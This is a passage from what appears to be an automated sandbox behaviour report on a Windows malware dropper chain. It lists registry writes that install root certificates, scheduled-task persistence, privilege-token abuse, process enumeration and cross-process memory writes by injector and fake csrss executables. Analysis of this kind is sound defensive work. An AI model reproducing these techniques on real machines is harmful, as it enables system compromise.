19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PST3N.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Program Files (x86)\Gparted\gimagex.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10799545d143108.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10d7483856.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Gparted\Build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2160 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe
PID 2160 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe
PID 2160 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe
PID 2160 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe
PID 2160 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe
PID 2160 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe
PID 2160 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe
PID 2848 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2636 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
